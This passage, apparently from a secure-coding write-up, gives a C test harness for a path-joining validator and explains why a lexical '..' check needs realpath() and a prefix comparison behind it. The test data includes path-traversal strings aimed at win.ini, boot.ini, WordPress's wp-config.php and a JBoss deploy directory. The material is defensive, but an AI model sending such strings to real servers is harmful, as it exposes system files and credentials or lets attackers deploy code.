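int main(void)
{
    /* Constructed requests: the three traversal strings from this page plus
     * a few benign and edge-case names. */
    struct { const char *base, *name; } req[] = {
        { "/opt/skyboxview/attachments", "../../../../../../../../../../../windows/win.ini" },
        { "/opt/skyboxview/patches",     "../../thirdparty/jboss/server/web/deploy/helloworld2.war" },
        { "/var/www/wp-content/plugins/advanced-dewplayer/files", "../../../../wp-config.php" },
        { "/opt/skyboxview/attachments", "reports/./2014/../q4.csv" },
        { "/opt/skyboxview/attachments", "ticket42.pdf" },
        { "/opt/skyboxview/attachments", "..\\..\\boot.ini" },
    };
    for (size_t i = 0; i < sizeof req / sizeof req[0]; i++) {
        const char *r = joined(req[i].base, req[i].name);
        printf("%-60s -> %s\n", req[i].name, r ? r : "REJECTED");
    }
    return 0;
}
```

This is a lexical check only: it stops ".." and absolute names before anything touches the filesystem, but it cannot see a symbolic link that already sits inside the base directory. On POSIX, pair it with realpath() on the path actually opened and a prefix comparison against the canonical base; the same check applies to the upload side, which is what would have kept helloworld2.war out of the JBoss deploy directory.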